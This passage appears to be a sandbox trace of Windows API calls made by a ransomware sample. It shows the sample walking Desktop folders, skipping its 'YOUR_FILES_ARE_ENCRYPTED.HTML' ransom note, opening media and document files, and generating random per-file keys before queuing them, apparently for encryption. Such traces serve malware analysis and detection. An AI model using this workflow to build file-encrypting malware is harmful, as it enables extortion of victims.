out: param_1="BB") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="4E") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="DE") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="91") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="83") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="0A") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="85") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="BF") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="F1") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="93") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="FA") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="C0") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="FD") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B1") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="33") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="07") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="EE") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="1F") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="5E") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="07") returned 2 [0123.684] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp" [0123.684] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.684] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0123.684] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5d238a0, ftCreationTime.dwHighDateTime=0x1d70809, ftLastAccessTime.dwLowDateTime=0x5b3121c0, ftLastAccessTime.dwHighDateTime=0x1d70888, ftLastWriteTime.dwLowDateTime=0x5b3121c0, ftLastWriteTime.dwHighDateTime=0x1d70888, nFileSizeHigh=0x0, nFileSizeLow=0xcb81, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="TeXpMKM3_N_X36rbQ.ods", cAlternateFileName="TEXPMK~1.ODS")) returned 1 [0123.684] StrStrIW (lpFirst="TeXpMKM3_N_X36rbQ.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.684] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods") returned 55 [0123.684] PathFindExtensionW (pszPath="TeXpMKM3_N_X36rbQ.ods") returned=".ods" [0123.684] lstrlenW (lpString=".ods") returned 4 [0123.684] PathFindExtensionW (pszPath="TeXpMKM3_N_X36rbQ.ods") returned=".ods" [0123.684] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\texpmkm3_n_x36rbq.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.685] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=52097) returned 1 [0123.685] GetProcessHeap () returned 0x600000 [0123.685] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0f08 [0123.688] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="69") returned 2 [0123.688] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2E") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="07") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D6") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="13") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="71") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="9A") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="D9") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="F7") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="83") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="C1") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="EC") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="1F") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="65") returned 2 [0123.688] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="C0") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="5D") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="53") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="19") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="4C") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="9E") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="F5") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="55") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="45") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="21") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="3C") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="73") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="99") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="28") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="BC") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C8") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="0B") returned 2 [0123.689] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="2C") returned 2 [0123.689] lstrcpyW (in: lpString1=0x32b0fbc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods" [0123.689] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x32a0f08, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.690] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0f08, lpOverlapped=0x32a0f08) returned 1 [0123.690] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0659480, ftCreationTime.dwHighDateTime=0x1d708bc, ftLastAccessTime.dwLowDateTime=0x87e87210, ftLastAccessTime.dwHighDateTime=0x1d7098f, ftLastWriteTime.dwLowDateTime=0x87e87210, ftLastWriteTime.dwHighDateTime=0x1d7098f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="tota", cAlternateFileName="")) returned 1 [0123.690] StrStrIW (lpFirst="tota", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.690] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota") returned 38 [0123.690] GetProcessHeap () returned 0x600000 [0123.690] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0123.691] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota" [0123.691] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\*" [0123.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0659480, ftCreationTime.dwHighDateTime=0x1d708bc, ftLastAccessTime.dwLowDateTime=0x87e87210, ftLastAccessTime.dwHighDateTime=0x1d7098f, ftLastWriteTime.dwLowDateTime=0x87e87210, ftLastWriteTime.dwHighDateTime=0x1d7098f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.691] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0659480, ftCreationTime.dwHighDateTime=0x1d708bc, ftLastAccessTime.dwLowDateTime=0x87e87210, ftLastAccessTime.dwHighDateTime=0x1d7098f, ftLastWriteTime.dwLowDateTime=0x87e87210, ftLastWriteTime.dwHighDateTime=0x1d7098f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName="..", cAlternateFileName="")) returned 1 [0123.691] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f300970, ftCreationTime.dwHighDateTime=0x1d6fc33, ftLastAccessTime.dwLowDateTime=0x5592cff0, ftLastAccessTime.dwHighDateTime=0x1d6fdae, ftLastWriteTime.dwLowDateTime=0x5592cff0, ftLastWriteTime.dwHighDateTime=0x1d6fdae, nFileSizeHigh=0x0, nFileSizeLow=0xe695, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName="JnATnk8TvNigHoXT.png", cAlternateFileName="JNATNK~1.PNG")) returned 1 [0123.691] StrStrIW (lpFirst="JnATnk8TvNigHoXT.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.691] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png") returned 59 [0123.691] PathFindExtensionW (pszPath="JnATnk8TvNigHoXT.png") returned=".png" [0123.691] lstrlenW (lpString=".png") returned 4 [0123.691] PathFindExtensionW (pszPath="JnATnk8TvNigHoXT.png") returned=".png" [0123.691] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\jnatnk8tvnighoxt.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0123.692] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=59029) returned 1 [0123.692] GetProcessHeap () returned 0x600000 [0123.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c9060 [0123.694] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="6F") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="93") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="7B") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="9B") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="34") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BD") returned 2 [0123.694] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BC") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="4A") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="EB") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="4E") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="E0") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="76") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="24") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="EC") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="D0") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="CB") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="6C") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="D9") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="F0") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E8") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="95") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="16") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="29") returned 2 [0123.694] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="77") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="7D") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A7") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="1A") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="89") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="90") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="22") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="06") returned 2 [0123.695] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="37") returned 2 [0123.695] lstrcpyW (in: lpString1=0x32d9114, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\JnATnk8TvNigHoXT.png" [0123.695] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32c9060, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.695] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c9060, lpOverlapped=0x32c9060) returned 1 [0123.697] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x349b1b10, ftCreationTime.dwHighDateTime=0x1d6fc03, ftLastAccessTime.dwLowDateTime=0x199c1720, ftLastAccessTime.dwHighDateTime=0x1d705ad, ftLastWriteTime.dwLowDateTime=0x199c1720, ftLastWriteTime.dwHighDateTime=0x1d705ad, nFileSizeHigh=0x0, nFileSizeLow=0x10bf, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName="o3MSC.bmp", cAlternateFileName="")) returned 1 [0123.697] StrStrIW (lpFirst="o3MSC.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.697] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp") returned 48 [0123.697] PathFindExtensionW (pszPath="o3MSC.bmp") returned=".bmp" [0123.697] lstrlenW (lpString=".bmp") returned 4 [0123.697] PathFindExtensionW (pszPath="o3MSC.bmp") returned=".bmp" [0123.697] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\o3msc.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0123.698] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=4287) returned 1 [0123.698] GetProcessHeap () returned 0x600000 [0123.698] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f11b8 [0123.700] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="15") returned 2 [0123.700] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="FD") returned 2 [0123.701] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F7") returned 2 [0123.701] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6F") returned 2 [0123.701] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="2B") returned 2 [0123.701] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="E4") returned 2 [0123.701] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="B5") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="71") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="9A") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="DF") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A2") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4E") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="36") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="4B") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="4E") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="14") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="3F") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="0B") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="08") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="FA") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="1A") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="08") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="4D") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="ED") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B7") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="58") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B5") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="0F") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="28") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="26") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="62") returned 2 [0123.701] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="59") returned 2 [0123.702] lstrcpyW (in: lpString1=0x330126c, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\o3MSC.bmp" [0123.702] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x32f11b8, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.702] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f11b8, lpOverlapped=0x32f11b8) returned 1 [0123.702] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6927f970, ftCreationTime.dwHighDateTime=0x1d7009a, ftLastAccessTime.dwLowDateTime=0xb416c700, ftLastAccessTime.dwHighDateTime=0x1d705da, ftLastWriteTime.dwLowDateTime=0xb416c700, ftLastWriteTime.dwHighDateTime=0x1d705da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0x2d0b38f, cFileName="RdWSR", cAlternateFileName="")) returned 1 [0123.702] StrStrIW (lpFirst="RdWSR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.702] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR") returned 44 [0123.702] GetProcessHeap () returned 0x600000 [0123.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0123.703] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR" [0123.703] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\*" [0123.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6927f970, ftCreationTime.dwHighDateTime=0x1d7009a, ftLastAccessTime.dwLowDateTime=0xb416c700, ftLastAccessTime.dwHighDateTime=0x1d705da, ftLastWriteTime.dwLowDateTime=0xb416c700, ftLastWriteTime.dwHighDateTime=0x1d705da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.704] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6927f970, ftCreationTime.dwHighDateTime=0x1d7009a, ftLastAccessTime.dwLowDateTime=0xb416c700, ftLastAccessTime.dwHighDateTime=0x1d705da, ftLastWriteTime.dwLowDateTime=0xb416c700, ftLastWriteTime.dwHighDateTime=0x1d705da, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="..", cAlternateFileName="")) returned 1 [0123.704] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x479629f0, ftCreationTime.dwHighDateTime=0x1d709d0, ftLastAccessTime.dwLowDateTime=0x3a516930, ftLastAccessTime.dwHighDateTime=0x1d70a34, ftLastWriteTime.dwLowDateTime=0x3a516930, ftLastWriteTime.dwHighDateTime=0x1d70a34, nFileSizeHigh=0x0, nFileSizeLow=0x17540, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="b25p6z xED.mp3", cAlternateFileName="B25P6Z~1.MP3")) returned 1 [0123.704] StrStrIW (lpFirst="b25p6z xED.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.704] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3") returned 59 [0123.704] PathFindExtensionW (pszPath="b25p6z xED.mp3") returned=".mp3" [0123.704] lstrlenW (lpString=".mp3") returned 4 [0123.704] PathFindExtensionW (pszPath="b25p6z xED.mp3") returned=".mp3" [0123.704] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0123.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\b25p6z xed.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.705] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=95552) returned 1 [0123.705] GetProcessHeap () returned 0x600000 [0123.705] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0123.707] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="F9") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="1D") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="B4") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="75") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="48") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="CA") returned 2 [0123.707] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="3D") returned 2 [0123.708] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="98") returned 2 [0123.708] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" 